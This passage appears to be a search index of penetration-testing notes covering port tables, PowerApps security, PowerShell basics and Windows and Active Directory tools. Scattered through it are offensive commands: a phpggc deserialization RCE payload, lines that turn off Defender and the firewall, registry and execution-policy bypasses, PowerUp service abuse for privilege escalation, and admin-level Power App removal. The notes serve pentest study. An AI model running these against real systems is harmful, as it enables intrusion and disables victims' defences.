    ","tags":["ports","services","network services"]},{"location":"pentesting-network-services/#tcp","title":"TCP","text":"Protocol Acronym Port Description Tools File Transfer Protocol FTP20-21 Used to transfer files ftp, lftp , ncftp, filezilla, crossftp Secure Shell SSH22 Secure remote login service Telnet Telnet23 Remote login service Simple Network Management Protocol SNMP161-162 Manage network devices Hyper Text Transfer Protocol HTTP80 Used to transfer webpages Hyper Text Transfer Protocol Secure HTTPS443 Used to transfer secure webpages Domain Name System DNS53 Lookup domain names Trivial File Transfer Protocol TFTP69 Used to transfer files Network Time Protocol NTP123 Synchronize computer clocks Simple Mail Transfer Protocol SMTP25 Used for email transfer Thunderbird, Claws, Geary, MailSpring, mutt, mailutils, sendEmail, swaks, sendmail. Post Office Protocol POP3110 Used to retrieve emails Internet Message Access Protocol IMAP143 Used to access emails Server Message Block SMB445 Used to transfer files Samba Suite, smbclient, crackmapexec, SMBMap, smbexec.py, psexec.py, Impacket Network File System NFS111, 2049 Used to mount remote systems Bootstrap Protocol BOOTP67, 68 Used to bootstrap computers Kerberos Kerberos88 Used for authentication and authorization Lightweight Directory Access Protocol LDAP389 Used for directory services Remote Authentication Dial-In User Service RADIUS1812, 1813 Used for authentication and authorization Dynamic Host Configuration Protocol DHCP67, 68 Used to configure IP addresses Remote Desktop Protocol RDP3389 Used for remote desktop access Network News Transfer Protocol NNTP119 Used to access newsgroups Remote Procedure Call RPC135, 137-139 Used to call remote procedures Identification Protocol Ident113 Used to identify user processes Internet Control Message Protocol ICMP0-255 Used to troubleshoot network issues Internet Group Management Protocol IGMP0-255 Used for multicasting Oracle DB (Default/Alternative) Listener oracle-tns1521/1526 The Oracle database default/alternative listener is a service that runs on the database host and receives requests from Oracle clients. Ingres Lock ingreslock1524 Ingres database is commonly used for large commercial applications and as a backdoor that can execute commands remotely via RPC. Squid Web Proxy http-proxy3128 Squid web proxy is a caching and forwarding HTTP web proxy used to speed up a web server by caching repeated requests. Secure Copy Protocol SCP22 Securely copy files between systems Session Initiation Protocol SIP5060 Used for VoIP sessions Simple Object Access Protocol SOAP80, 443 Used for web services Secure Socket Layer SSL443 Securely transfer files TCP Wrappers TCPW113 Used for access control Network Time Protocol NTP123 Synchronize computer clocks Internet Security Association and Key Management Protocol ISAKMP500 Used for VPN connections Microsoft SQL Server ms-sql-s1433 Used for client connections to the Microsoft SQL Server. mssql-cli, mssqlclient.py, dbeaver Kerberized Internet Negotiation of Keys KINK892 Used for authentication and authorization Open Shortest Path First OSPF520 Used for routing Point-to-Point Tunneling Protocol PPTP1723 Is used to create VPNs Remote Execution REXEC512 This protocol is used to execute commands on remote computers and send the output of commands back to the local computer. Remote Login RLOGIN513 This protocol starts an interactive shell session on a remote computer. 
X Window System X116000 It is a computer software system and network protocol that provides a graphical user interface (GUI) for networked computers. Relational Database Management System DB250000 RDBMS is designed to store, retrieve and manage data in a structured format for enterprise applications such as financial systems, customer relationship management (CRM) systems.","tags":["ports","services","network services"]},{"location":"pentesting-network-services/#udp","title":"UDP","text":"Protocol Acronym Port Description Domain Name System DNS53 It is a protocol to resolve domain names to IP addresses. Trivial File Transfer Protocol TFTP69 It is used to transfer files between systems. Network Time Protocol NTP123 It synchronizes computer clocks in a network. Simple Network Management Protocol SNMP161 It monitors and manages network devices remotely. Routing Information Protocol RIP520 It is used to exchange routing information between routers. Internet Key Exchange IKE500 Internet Key Exchange Bootstrap Protocol BOOTP68 It is used to bootstrap hosts in a network. Dynamic Host Configuration Protocol DHCP67 It is used to assign IP addresses to devices in a network dynamically. Telnet TELNET23 It is a text-based remote access communication protocol. MySQL MySQL3306 It is an open-source database management system. Terminal Server TS3389 It is a remote access protocol used for Microsoft Windows Terminal Services by default. NetBIOS Name netbios-ns137 It is used in Windows operating systems to resolve NetBIOS names to IP addresses on a LAN. Microsoft SQL Server ms-sql-m1434 Used for the Microsoft SQL Server Browser service. Universal Plug and Play UPnP1900 It is a protocol for devices to discover each other on the network and communicate. PostgreSQL PGSQL5432 It is an object-relational database management system. Virtual Network Computing VNC5900 It is a graphical desktop sharing system. X Window System X116000-6063 It is a computer software system and network protocol that provides GUI on Unix-like systems. Syslog SYSLOG514 It is a standard protocol to collect and store log messages on a computer system. Internet Relay Chat IRC194 It is a real-time Internet text messaging (chat) or synchronous communication protocol. OpenPGP OpenPGP11371 It is a protocol for encrypting and signing data and communications. Internet Protocol Security IPsec500 IPsec is also a protocol that provides secure, encrypted communication. It is commonly used in VPNs to create a secure tunnel between two devices. Internet Key Exchange IKE11371 It is a protocol for encrypting and signing data and communications. X Display Manager Control Protocol XDMCP177 XDMCP is a network protocol that allows a user to remotely log in to a computer running the X11.","tags":["ports","services","network services"]},{"location":"pesecurity/","title":"PESecurity - A powershell script to check windows binaries compilations","text":"

    PESecurity is a powershell script that checks if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, Authenticode, Control Flow Guard, and HighEntropyVA.

    "},{"location":"pesecurity/#installation","title":"Installation","text":"

    Download from: https://github.com/NetSPI/PESecurity.

    "},{"location":"pesecurity/#usage","title":"Usage","text":"
# To execute Get-PESecurity, first import the module\nImport-Module .\\Get-PESecurity.psm1\n\n# Check a single file\nGet-PESecurity -file C:\\Windows\\System32\\kernel32.dll\n\n# Check a directory for DLLs & EXEs\nGet-PESecurity -directory C:\\Windows\\System32\\\n\n# Check a directory for DLLs & EXEs recursively\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive\n\n# Export results as a CSV\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | Export-CSV file.csv\n\n# Show results in a table\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | Format-Table\n\n# Show results sorted by a column, then in a table\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | sort ASLR | Format-Table\n
    "},{"location":"phpggc/","title":"Phpggc - A tool for PHP deserialization","text":"

    PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.

    It can be seen as the equivalent of frohoff's ysoserial, but for PHP.

    Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.

    ","tags":["webpentesting","tools","deserialization","php"]},{"location":"phpggc/#installation","title":"Installation","text":"

    Repository: https://github.com/ambionics/phpggc

    Clone it:

    git clone https://github.com/ambionics/phpggc.git\n

    List available gadget chains:

    cd phpggc\n\n./phpggc -l\n

    Example from Burpsuite lab:

./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64 -w 0 > test.txt\n
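phpggc can also apply the encoding itself; a minimal sketch, assuming the -b (base64) encoder flag available in current phpggc releases, with a harmless command as the payload:

# Generate a Symfony gadget chain and base64-encode it in one step\n./phpggc -b Symfony/RCE4 exec 'id'\n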
    ","tags":["webpentesting","tools","deserialization","php"]},{"location":"ping/","title":"Ping","text":"

    ping works by sending one or more special ICMP packets (Type 8 - echo request) to a host. If the destination host replies with ICMP echo reply packets, then the host is alive.

    ping www.example.com\nping 8.8.8.8\n

    Ping sweeping tools automatically perform the same operation to every host in a subnet or IP range.
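A minimal bash ping sweep sketch (the 10.10.10.0/24 range is a placeholder; adjust it to your target network):

# Send one echo request per host with a 1-second timeout and report the ones that answer\nfor i in $(seq 1 254); do ping -c 1 -W 1 10.10.10.$i >/dev/null 2>&1 && echo 10.10.10.$i is alive; done\n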

    ","tags":["scanning","reconnaissance"]},{"location":"postfix/","title":"postfix - A SMTP server","text":"","tags":["linux","tool","SMTP","SMTP server"]},{"location":"postfix/#local-installation","title":"Local installation","text":"
    sudo apt update\n\nsudo apt install mailutils\n# At the end of the installation a pop up will prompt you about the general type of mail configuration. Pick \"Internet site\". If not prompted, run this to execute it:\nsudo dpkg-reconfigure postfix\n# System mail name must coincide with the  server's name you provided before.\n

    To edit the configuration of the service:

    sudo nano /etc/postfix/main.cf\n

    More on https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-postfix-as-a-send-only-smtp-server-on-ubuntu-18-04-es.
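To verify the send-only setup, a quick test using the mail command shipped with mailutils (the recipient address is a placeholder):

echo \"Test body\" | mail -s \"Postfix test\" someone@example.com\n\n# Delivery errors, if any, will show up in the mail log\nsudo tail /var/log/mail.log\n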

    ","tags":["linux","tool","SMTP","SMTP server"]},{"location":"powerapps-pentesting/","title":"Pentesting PowerApps","text":"

    Sources from these notes

    Power Apps - Complete Guide to Microsoft PowerApps

PowerApps falls into the category of no-code/low-code solutions. It is the Microsoft platform for developing applications: the app is built in a Power Apps environment that takes care of everything needed for your code to run anywhere.

Power Apps enables your application to connect to almost anything and offers a great deal of customization features.

    Power Apps developed in the Power Platform environment and published for use by internal and external users are often critical to the organization.

They enable key business processes, leverage and interface with highly sensitive business data, and integrate with multiple data sources and applications, consequently becoming the gateway from the cloud to the most sensitive business applications of the organization.

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#basics-on-powerapps","title":"Basics on PowerApps","text":"

    Power Apps is a collection of services, apps, and connectors that work together to let you do much more than just view your data. You can act on your data and update it anywhere and from any device.

    Power Apps Home Page: If you are building an app, you'll start with the Power Apps Home Page. You can build apps from sample apps, templates, or a blank screen.

    Power Apps Studio: Power Apps Studio is where you can fully develop your apps to make them more effective as a business tool and to make them more attractive:

    • Left pane - Shows a hierarchical view of all the controls on each screen or a thumbnail for each screen in your app.
    • Middle pane - Shows the canvas app that you're working on.
    • Right pane - Where you set options such as the layout, properties, and data sources for certain controls.

    Microsoft Power Platform admin center: Microsoft Power Platform admin center is the centralized place for managing Power Apps for an organization. On this site, you can define and manage different environments to house the apps. For example, you might have separate environments for development and production apps. Additionally, you can define data connections and manage environment roles and data policies.

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#simple-data-application","title":"Simple data application","text":"

You just need to connect a spreadsheet that contains a table; what you actually connect is the table. PowerApps synchronizes your application with it by adding an id column to the table in your spreadsheet.

    Your new app will have three components:

    • Listing page screen.
    • Details screen
• CRUD operations on records: Edit record, Add new record, Delete record.

Each item/record corresponds to a row of your connected spreadsheet. A gallery is a representation of a list of records pulled from a connected table.

Saving the application: by default Microsoft will autosave your app, but for that to happen you first need to save it manually once.

Tree view displays all the screens of your application. Under the screen level you have the elements that compose your screen. Elements can have sub-elements.

    Properties

    Elements have properties. Properties can be set statically or dynamically. Dynamically set properties open the door for users updating values or things like resizing elements based on height, for instance.

# This references the connected spreadsheet column name\nThisItem.HeadingColumnName \n\n# This will reference the value inserted in that element.\nNameofElement.Default \n

    Additionally, you have formatting functions, like for instance the Text function, that can be applied to a property (dynamically or statically established).

# Format element to mm/dd/yyyy \nText(ThisItem.HeadingColumnName, \"mm/dd/yyyy\" )\n\n# Concatenate elements \nConcatenate (ThisItem.HeadingColumnName, ThisItem.HeadingColumnName2)\n# For instance:  Concatenate (ThisItem.FirstName, ThisItem.LastName)\n\nConcatenate (NameofElement.Default,  NameofElement2.Default)  \n# For instance: Concatenate (First_Name_Card.Default, Last_Name_Card.Default)  \n

A data card has a property called UPDATE. This is useful for forms and user input, where what you finally submit to the database is not the raw input but the result of that input after the UPDATE transformation has taken place.

In short, when you click the check mark, the app uses the Update property of each data card and submits the resulting values to the underlying data source.

    More properties:

• DisplayMode. This can be set to View, Edit... You can granularly set the property of an element to View (so no editing is possible), or you can set that property on its parent.

    Triggers

Elements have properties and triggers. A trigger is an action that a user performs on an element. Triggers are quite similar to event handlers in JavaScript (onload, onselect, ...).

Configuring a trigger: you select an element (a button), set the action you want (onclick) and the function you want to assign to it (submit). You can separate multiple actions with \";\".

Triggers help you build the functionality of your application. For instance, in this basic app, navigation from one screen to another is performed with a Navigate trigger. Starting the application is a trigger itself.

    Formulas and functions

    Formula Reference for PowerApps

    Canvas application

    Building an application from scratch.

A common practice is to have a master screen and a documentation screen. First, create a master screen that will be used as a template for the rest of the screens in your application. Second, create a screen named Documentation. The master screen is where you create the elements of your app; the Documentation screen is for assigning styles to those elements. Master screen elements will reference the Documentation screen.

Variables in Power Apps are different from variables in programming languages. There are 3 types:

• Contextual variables: only active while you are on the screen where they were defined.
    • Global variables: they are accessible from all screens in the application.
    • Collection variables.

How to set up a contextual variable: select an element on the screen, select \"OnSelect\" and add the function:

    UpdateContext({FirstNumber: TextInput.Text})\n# When you select an element, for instance an input field, it will create a variable called FirstNumber and it will assign it the value of the input field that you have selected\n

How to set up a global variable: by using the Set function.

    Set(CounterGlobal, CounterGlobal+1)\n

Collection variables are useful for data tables and galleries.

Example: create a button and, OnSelect on that button, add this function:

Collect(OurCollection, {First: \"Ben\", Second: \"Dover\"})\n# This creates a collection called OurCollection with two columns, First and Second. The first record has \"Ben\" in the First column and \"Dover\" in the Second column.\n

Create a Gallery and, as its data source, add your collection. This way, every time you click on that button you will be adding \"Ben\" and \"Dover\" as a card to that gallery. Of course, you can substitute those two static texts with references to input fields:

Collect(OurCollection, {First: TextInput4.Text, Second: TextInput5.Text})\n

To remove an item from a collection, add an icon button for removing it and, OnSelect:

    Remove(OurCollection, ThisItem)\n

Filtering cards displayed in a gallery. Select the Gallery and set its Items property:

Search(NameOfTable, <ElementToSearch>, <WhichColumnsSearchinTable>)\n\n# For example, to display all cards in connected table \"Table1\":\nSearch(Table1, \"\", \"FirstName\")\n\n# To make it dependent on the user's input, create an input field and\nSearch(Table1, TexInput1.Text, \"FirstName\", \"LastName\", \"Location\")\n

Only show the search input if someone clicks on the search icon.

    • Set the Input search box default visibility to False.
    • Insert a magnifier icon. OnSelect:

      UpdateContext({SearchVisible: True})\n
• Modify the search input field. Set its Visible property to:

      SearchVisible\n

To toggle SearchVisible back to false (and hide the search input field), modify the magnifier icon's OnSelect:

UpdateContext({SearchVisible: !SearchVisible})\n

Another interesting formula is Filter:

    # An example of a multi-layered built function, with Filter and Search functionality. Create a dropdown menu > Items\nFilter(Search(Table1, TexInput1.Text, \"FirstName\", \"LastName\", \"Location\"), VIPLevel = Dropdown.Selected.Value)\n

    And also SubmitForm, which aggregates all the updates in a form control and submits the form.

    SubmitForm(FormName)\n
    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#well-known-vulnerabilities-under-build","title":"Well-known vulnerabilities (under build)","text":"","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#data-exposure","title":"Data exposure","text":"

    https://rencore.com/en/blog/how-to-prevent-the-next-microsoft-power-apps-data-leak-from-happening

    From https://dev.to/wyattdave/ive-just-been-hacked-by-a-power-app-1fj4

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#not-using-service-accounts","title":"Not using Service accounts","text":"

The security issue is all around how the Power Platform handles credentials: each user/owner signs in and stores their credentials in connections. This means that if you share a flow created with your user, you are sharing your connections (aka credentials).

    One way to prevent this issue is by using service accounts.

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#sharing-flows","title":"Sharing flows","text":"

    If you need to share a flow:

• Use \"Send a copy\", or
• share the flow as a run-only user (as that requires their credentials).
    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#configuring-connections-to-the-least-privilege","title":"Configuring connections to the least privilege","text":"

When configuring a flow, don't include additional unnecessary connections. Given how Power Apps handles connections, this situation may happen:

A connection gets set to a higher privilege than needed (you mean to share calendar read access and you end up giving write access to emails).

This model has its strengths, as all credentials are securely stored, and accessing apps or running flows is easy since the Power Platform handles everything. The problem comes when you share flows: what you might not realise is that you are sharing your connections (aka credentials) with that user. They may not be able to see your credentials, but that doesn't mean they can't use them in a way that you didn't intend. What's worse, there is no granularity in connections, so an Outlook connection used for reading events can be used to delete emails.

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#protecting-powerapps-with-microsoft-sentinel","title":"Protecting PowerApps with Microsoft Sentinel","text":"

As Power Platform is part of the Microsoft offering, Microsoft Sentinel addresses many security issues:

• Collect Microsoft Power Platform and Power Apps activity logs, audits, and events into the Microsoft Sentinel workspace.
• Detect execution of suspicious, malicious, or illegitimate activities within Microsoft Power Platform and Power Apps.
• Investigate threats detected in Microsoft Power Platform and Power Apps and contextualize them with additional user activities across the organization.
• Respond to Microsoft Power Platform-related and Power Apps-related threats and incidents in a simple and canned manner manually, automatically, or via a predefined workflow.

Data connectors for Microsoft Sentinel

    Connector Name Covered Logs / Inventory Power Platform Inventory (using Azure Functions) Power Apps and Power Automate inventory data Microsoft Power Apps (Preview) Power Apps activity logs Microsoft Power Automate (Preview) Power Automate activity logs Microsoft Power Platform Connectors (Preview) Power Platform connector activity logs Microsoft Power Platform DLP (Preview) Data loss prevention activity logs Dynamics365 Dataverse and model-driven apps activity logging

    Sentinel rules for protecting PowerApps platform:

    Rule name What does it detect? PowerApps - App activity from unauthorized geo Identifies Power Apps activity from countries in a predefined list of unauthorized countries. PowerApps - Multiple apps deleted Identifies mass delete activity where multiple Power Apps are deleted within a period of 1 hour, matching a predefined threshold of total apps deleted or app deletes events across multiple Power Platform environments. PowerApps - Data destruction following publishing of a new app Identifies a chain of events where a new app is created or published, that is followed by mass update or delete events in Dataverse within 1 hour. The incident severity is raised if the app publisher is on the list of users in the TerminatedEmployees watchlist template. PowerApps - Multiple users accessing a malicious link after launching new app Identifies a chain of events, where a new Power App is created, followed by multiple users launching the app within the detection window and clicking on the same malicious URL. PowerAutomate - Departing employee flow activity Identifies instances where an employee who has been notified or is already terminated creates or modifies a Power Automate flow. PowerPlatform - Connector added to a Sensitive Environment Identifies occurrences of new API connector creations within Power Platform, specifically targeting a predefined list of sensitive environments. PowerPlatform - DLP policy updated or removed Identifies changes to DLP policy, specifically policies which are updated or removed.","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#attacks","title":"Attacks","text":"

    Install m365 CLI.
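A minimal sketch of getting the CLI ready (assumes Node.js/npm is available on the attacking machine):

# Install the CLI for Microsoft 365 globally and authenticate to the tenant\nnpm install -g @pnp/cli-microsoft365\nm365 login\n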

    ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#ennumeration-techniques","title":"Ennumeration techniques","text":"

    Get information about the default Power Apps environment.

    m365 pa environment get  \n

    List Microsoft Power Apps environments in the current tenant

    m365 pa environment list \n

    List all available apps for that user

    m365 pa app list  \n

    List all apps in an environment as Admin

    m365 pa app list --environmentName 00000000-0000-0000-0000-000000000000 --asAdmin  \n

    Remove an app

    m365 pa app remove --name 00000000-0000-0000-0000-000000000000  \n

    Removes the specified Power App without confirmation

    m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --force  \n

    Removes the specified Power App you don't own

m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --environmentName Default-00000000-0000-0000-0000-000000000000 --asAdmin  \n

    Add an owner without removing the old one

    m365 pa app owner set --environmentName 00000000-0000-0000-0000-000000000000 --appName 00000000-0000-0000-0000-000000000000 --userId 00000000-0000-0000-0000-000000000000 --roleForOldAppOwner CanEdit  \n

    Export an app

    m365 pa app export --environmentName 00000000-0000-0000-0000-000000000000 --name 00000000-0000-0000-0000-000000000000 --packageDisplayName \"PowerApp\" --packageDescription \"Power App Description\" --packageSourceEnvironment \"Pentesting\" --path ~/Documents\n
    ","tags":["database","cheat","sheet"]},{"location":"powercat/","title":"Powercat - An alternative to netcat coded in PowerShell","text":"

Netcat comes pre-installed in most Linux distributions. There is also a version for Windows: download it from https://nmap.org/download.html.

    As for Windows machines, there's an alternative to netcat coded in PowerShell called PowerCat.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"powershell/","title":"Powershell","text":""},{"location":"powershell/#basic-commands","title":"Basic commands","text":"
# List users of Administrator group\nnet localgroup Administrators\n\n# List contents\ndir\nGet-ChildItem -Force\n# -Force: Display hidden files \n\n# Print working directory\npwd\nGet-Location\n\n# Change directory\ncd\ncd ..           # go up one level\ncd ..\\brotherdirectory  # go to a sibling directory\ncd ~\\Desktop        # go to the logged-in user's Desktop\n\n# Create a folder\nmkdir nameOfFolder\nNew-Item -ItemType Directory nameOfDirectory\n\n# Display the command history\nhistory\nGet-History\n\n# Browse the command history\nCTRL-R\n\n# Clear screen\nclear\nClear-Host\n\n# Copy item\ncp nameOfSource nameOfDestiny\nCopy-Item nameOfSource nameOfDestiny\n\n# Copy a folder and its content\ncp originFolder destinyPath -Recurse\nCopy-Item originFolder destinyPath -Recurse\n\n# Get running processes filtered by name\nget-process -name ccSvcHst\n\n# Kill processes called ccSvcHst* (note the wildcard *)\ntaskkill /f /im ccSvcHst*\n\n# Remove a file\nrm nameofFile -Recurse\n# -Recurse: Remove it recursively (in a folder)\n\n# Display content of a file\ncat nameofFile\nGet-Content nameofFile\n\n# Display one page of a file at a time\nmore nameofFile\n\n# Display the first lines of a file\nhead nameofFile\n\n# Open a file with an app\nstart nameofApp nameofFile\n\n# Run commands or expressions on the local computer.\n$Command = \"Get-Process\"\nInvoke-Expression $Command\n\n# PS uses Invoke-Expression to evaluate the string. Otherwise the output of $Command would be the text \"Get-Process\". Invoke-Expression is similar to $($command) in Linux.\n# IEX is an alias\n\n# Deactivate antivirus from a powershell session (if the user has rights to do so)\nSet-MpPreference -DisableRealtimeMonitoring $true\n\n# Disable firewall\nnetsh advfirewall set allprofiles state off\n\n# Add a registry value\nreg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n
    "},{"location":"powershell/#powershell-wildcards","title":"Powershell wildcards","text":"

    The four types of Wildcard:

    The * wildcard will match zero or more characters

    The ? wildcard will match a single character

    [m-n] Match a range of characters from m to n, so [f-m]ake will match fake/jake/make

    [abc] Match a set of characters a,b,c.., so [fm]ake will match fake/make

    "},{"location":"powershell/#filters","title":"Filters","text":"

    Filters are a way to power up our queries in powershell.

    Example: We can use the Filter parameter with the notlike operator to filter out all Microsoft software (which may be useful when enumerating a system for local privilege escalation vectors).

    get-ciminstance win32_product -Filter \"NOT Vendor like '%Microsoft%'\" | fl\n

The -Filter parameter requires at least one operator:

Filter Meaning -eq Equal to -le Less than or equal to -ge Greater than or equal to -ne Not equal to -lt Less than -gt Greater than -approx Approximately equal to -bor Bitwise OR -band Bitwise AND -recursivematch Recursive match -like Like -notlike Not like -and Boolean AND -or Boolean OR -not Boolean NOT"},{"location":"powershell/#filter-examples-ad-object-properties","title":"Filter Examples: AD Object Properties","text":"

    The filter can be used with operators to compare, exclude, search for, etc., a variety of AD object properties. Filters can be wrapped in curly braces, single quotes, parentheses, or double-quotes. For example, the following simple search filter using Get-ADUser to find information about the user \"Sally Jones\" can be written as follows:

Get-ADUser -Filter \"name -eq 'sally jones'\"\nGet-ADUser -Filter {name -eq 'sally jones'}\nGet-ADUser -Filter 'name -eq \"sally jones\"'\n

    As seen above, the property value (here, sally jones) can be wrapped in single or double-quotes.

# The asterisk (`*`) can be used as a wildcard when performing queries. \nGet-ADUser -filter {name -like \"joe*\"}\n# it returns all domain users whose name starts with `joe` (joe, joel, etc.).\n
    "},{"location":"powershell/#escaping-characters","title":"Escaping characters","text":"

    When using filters, certain characters must be escaped:

Character Escaped As Note " `" Only needed if the data is enclosed in double-quotes. ' \' Only needed if the data is enclosed in single quotes. NULL \00 Standard LDAP escape sequence. \ \5c Standard LDAP escape sequence. * \2a Escaped automatically, but only in -eq and -ne comparisons. Use -like and -notlike operators for wildcard comparison. ( \28 Escaped automatically. ) \29 Escaped automatically. / \2f Escaped automatically."},{"location":"powershell/#basic-commands-for-reconnaissance","title":"Basic commands for reconnaissance","text":"
# Display relevant PowerShell version information\n$PSVersionTable\n\n# Check current execution policy. If the answer is\n# - \"Restricted\": PS scripts cannot run.\n# - \"RemoteSigned\": Downloaded scripts will require the script to be signed by a trusted publisher.\nGet-ExecutionPolicy\n\n# Bypass execution policy\npowershell -ep bypass\n\n# You can tell if PowerShell is running with administrator privileges (a.k.a. \"elevated\" rights) with the following snippet:\n[Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains 'S-1-5-32-544'\n# [Security.Principal.WindowsIdentity]::GetCurrent() - Retrieves the WindowsIdentity for the currently running user.\n# (...).Groups - Access the Groups property of the identity to find out what user groups the identity is a member of.\n# -contains \"S-1-5-32-544\" returns true if Groups contains the well-known SID of the Administrators group (the identity will only contain it if \"run as administrator\" was used) and otherwise false.\n\n# List which processes are elevated:\nGet-Process | Add-Member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated\n\n# List installed software on a computer\nget-ciminstance win32_product | fl\n\n# Get content from a web page on the internet.\nInvoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1\n# aliases: `iwr`, `curl`, and `wget`\n
    "},{"location":"powershell/#disk-management","title":"Disk Management","text":"
    # Show disks\nGet-Disk\n\n# Show disks in a more humanly mode\nGet-disk | FT -AutoSize\n\n# Show partitions from a disk\nGet-Partition -DiskNumber 1\n\n# Create partition\nNew-Partition -DiskNumber 1 -Size 50GB -AssignDriveLetter\n\n# Show volume\nGet-volume -DriveLetter e\n\n# Format Disk and assign file system\nFormat-volume -DriveLetter E -FileSystem NTFS\n\n# Delete Partition \nRemove-Partition -DriveLetter E\n
    "},{"location":"powershell/#disk-management-with-diskpart","title":"Disk Management with diskpart","text":"

Diskpart is a command interpreter that helps you manage your computer's drives. How does it work? Before using diskpart commands, you usually have to list and select the object you want to operate on.

# To enter the diskpart command interpreter\ndiskpart\n\n# Enumerate disks\nlist disk\n\n# Select disk\nselect disk 0\n\n# Enumerate volumes\nlist volume\n\n# Select volume\nselect volume 1\n\n# Enumerate partitions\nlist partition\n\n# Select partition\nselect partition 2\n\n# Extend a volume (once you have it selected)\nextend size=2048\n\n# Shrink a volume (once you have it selected)\nshrink desired=2048\n
    "},{"location":"powershell/#howtos","title":"Howtos","text":""},{"location":"powershell/#how-to-delete-shortcuts-from-public-desktop","title":"How to delete shortcuts from Public Desktop","text":"
# Instead of \"everyone\" set the group that you prefer\n$acl = Get-ACL \"C:\\Users\\Public\\Desktop\"\n\n$rule = New-Object System.Security.AccessControl.FileSystemAccessRule (\"everyone\", \"FullControl\", \"ContainerInherit,ObjectInherit\", \"None\", \"Allow\")\n\n$acl.SetAccessRule($rule)\n\nSet-ACL \"C:\\Users\\Public\\Desktop\" $acl\n
    "},{"location":"powershell/#how-to-uninstall-winzip-from-powershell-line-of-command","title":"How to uninstall winzip from powershell line of command","text":"
# Show all software installed:\nGet-WmiObject -Class win32_product\n\n# Find the WinZip object\nGet-WmiObject -Class win32_product | where { $_.Name -like \"*Winzip*\"}\n\n# Create a variable for the object\n$wzip = Get-WmiObject -Class win32_product | where { $_.Name -like \"*Winzip*\"}\n\n# Uninstall it:\nmsiexec /x $wzip.localpackage /passive\n

This will start the uninstallation of WinZip and will show only the progress bar (because we are using msiexec's /passive switch).

    "},{"location":"powerup/","title":"PowerUp.ps1","text":"

    Run from powershell.

    ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerup/#installation","title":"Installation","text":"

    Download from PowerSploit Github repo: https://github.com/ZeroDayLab/PowerSploit.

    Import-Module .\\PowerUp.ps1\n
    ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerup/#basic-commands","title":"Basic commands","text":"
# Find vulnerable services on the local machine\nInvoke-AllChecks\n\n# Exploit a vulnerable service to escalate to the more privileged user that runs that service\nInvoke-ServiceAbuse -Name '<NAME OF THE SERVICE>' -UserName '<DOMAIN CONTROLLER>\\<MY CURRENT USERNAME>'\n
    ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerview/","title":"powerview.ps1","text":"
    "},{"location":"powerview/#powerviewps1","title":"Powerview.ps1","text":"

    Run from powershell.

    Download from PowerSploit Github repo: https://github.com/ZeroDayLab/PowerSploit.

Import-Module .\\Powerview.ps1\n
    "},{"location":"powerview/#enumeration-cheat-sheet","title":"Enumeration cheat sheet","text":"
# Enumerate users\nGet-NetUser\n\n# Enumerate computers in the domain\nGet-NetComputer \nGet-NetComputer | select name\nGet-NetComputer -OperatingSystem \"Linux\"\n\n# Display info of current domain. Pay attention to the forest element, to see if there is a bigger structure\nGet-NetDomain\n\n# Get the SID for the current domain (useful later for crafting Golden Tickets)\nGet-DomainSID\n\n# Display policies for the domain and accounts, including for instance LockoutBadAccounts\nGet-DomainPolicy\n\n# Display the Domain Controller\nGet-NetDomainController\n\n# List users in the domain. Useful to search for non-expiring passwords, group membership, their SPN, last time they changed their password... \nGet-NetUser\nGet-NetUser john.doe\n\n# List users associated with a Service Principal Name (SPN) \nGet-NetUser -SPN\n\n# List groups in the domain\nGet-NetGroup\n\n# List Group Policy Objects in the domain\nGet-NetGPO\n\n# List Domain Trusts\nGet-NetDomainTrust\n
    "},{"location":"process-capabilities-getcap/","title":"Process capabilities: getcap","text":"

    Linux capabilities provide a subset of the available root privileges to a process. For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials (usually: effective UID, effective GID, and supplementary group list).

    In Linux, files may be given specific capabilities. For example, if an executable needs to access (read) files that are only readable by root, it is possible to give that file this \u2018permission\u2019 without having it run with complete root privileges. This allows for a more secure system in general.

    getcap and setcap are used to view and set capabilities, respectively. They usually belong to the libcap2-bin package on debian and debian-based distributions.
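As an illustration of both tools (the binary path and capability here are arbitrary examples, not a recommendation):

# Grant CAP_NET_RAW to a binary, then verify it\nsudo setcap cap_net_raw+ep /usr/local/bin/mytool\ngetcap /usr/local/bin/mytool\n# Expected output similar to: /usr/local/bin/mytool cap_net_raw=ep\n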

Scan all files on the system and check their capabilities:

